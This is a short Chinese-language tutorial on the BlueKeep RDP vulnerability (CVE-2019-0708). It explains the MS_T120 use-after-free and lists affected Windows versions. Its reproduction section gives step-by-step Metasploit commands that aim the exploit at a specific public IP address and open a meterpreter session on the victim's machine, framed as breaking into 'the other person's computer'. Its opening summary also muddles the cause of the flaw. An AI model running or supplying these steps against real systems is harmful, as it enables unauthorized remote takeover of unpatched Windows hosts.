一、概要
CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。
二、原理
存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行。
三、影响版本
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows Server 2003
Windows XP
四、复现过程(CVE-2019-0708漏洞复现)
msfconsole
search cve-2019-0708
use 0
show options
set RHOSTS 54.191.138.128
run
sessions #查看上钩的用户
sessions -i 1 #选择需要攻击的用户,这里选择第 1 个
出现
meterpreter
你就已经成功的入侵的对方的电脑